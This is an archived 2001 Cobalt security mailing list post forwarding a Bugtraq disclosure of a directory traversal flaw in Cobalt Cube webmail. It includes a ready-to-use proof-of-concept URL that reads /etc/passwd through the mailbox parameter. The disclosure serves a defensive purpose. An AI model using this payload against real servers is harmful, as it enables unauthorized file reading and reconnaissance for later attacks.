[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[cobalt-security] Cobalt Cube Webmail directory traversal (fwd)

Subject: [cobalt-security] Cobalt Cube Webmail directory traversal (fwd)
From: Gossi The Dog <gossi@xxxxxxxxxxxxxx>
Date: Fri, 6 Jul 2001 12:44:19 +0100 (BST)
List-id: Mailing list for users to address network security on Cobalt products. <cobalt-security.list.cobalt.com>

FYI.  Disable webmail until Cobalt fix this one.

---------- Forwarded message ----------
Date: Thu, 05 Jul 2001 03:41:50 -0400
From: KF <dotslash@xxxxxxxxxxx>
To: bugtraq@xxxxxxxxxxxxxxxxx, recon@xxxxxxxxxxx
Subject: Cobalt Cube Webmail directory traversal

I just got a new Cobalt Cube today and I have been poking around at it
for security issues... I noticed this minor issue in the webmail system.
Your
users are not aloud to have shell access by default however if they
malform their mailbox requests they can read local files with the perms
of the webserver. If your users have shell access they will not really
be gaining anything however this could be used to remotely gather
information for a future attack.

[admin admin]$ uname -a
Linux cube.ckfr.com 2.2.16C7 #1 Fri Sep 8 15:58:03 PDT 2000 i586 unknown
[admin admin]$ cat /etc/issue

Cobalt Linux release 6.0 (Carmel)
Kernel 2.2.16C7 on an i586

http://YOURCOBALTBOX:444/base/webmail/readmsg.php?mailbox=../../../../../../../../../../../../../../etc/passwd&id=1

-KF

Follow-Ups:
- Re: [cobalt-security] Cobalt Cube Webmail directory traversal (fwd)
  - From: shimi

Prev by Date: Re: [cobalt-security] UDP Scans
Next by Date: Re: [cobalt-security] Cobalt Cube Webmail directory traversal (fwd)
Previous by thread: Re: [cobalt-security] UDP Scans
Next by thread: Re: [cobalt-security] Cobalt Cube Webmail directory traversal (fwd)

Sun Cobalt Security Message Index

Sun Cobalt Security Thread Index